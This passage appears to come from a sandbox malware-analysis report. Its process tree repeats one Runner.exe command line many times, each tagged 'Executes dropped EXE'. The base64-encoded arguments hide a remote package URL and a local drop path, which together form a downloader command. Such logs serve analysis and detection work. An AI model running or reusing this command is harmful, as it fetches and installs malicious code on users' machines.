    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:344
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2844
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2764
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2660
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2260
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1872
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2204
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2188
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:324
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1120
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1500
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1976
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:412
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2944
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1804
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1580
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2172
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1948
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1676
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2724
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2500
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2412
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2432
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2356
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2680
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1032
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1468
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1260
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2044
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1056
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2104
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:800
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:956
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
